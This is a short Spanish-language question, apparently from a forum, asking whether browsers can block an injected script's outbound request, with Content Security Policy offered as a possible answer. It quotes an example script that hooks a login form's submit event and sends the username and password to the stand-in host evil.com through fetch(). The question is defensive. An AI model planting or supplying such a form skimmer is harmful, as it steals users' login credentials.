Supongamos que un atacante logra inyectar este script en una página de inicio de sesión:
const form = document.getElementsByTagName('form')[0];
form.addEventListener('submit', stealCredentials);
function stealCredentials() {
const login = document.getElementsByName('login')[0].value;
const password = document.getElementsByName('password')[0].value;
fetch('evil.com/?login=' + login + '&password=' + password);
}
¿Es posible prevenir la solicitud? La misma política de origen no parece admitir dicha restricción.
¿Quizás una lista blanca similar a la de la Política de seguridad de contenido?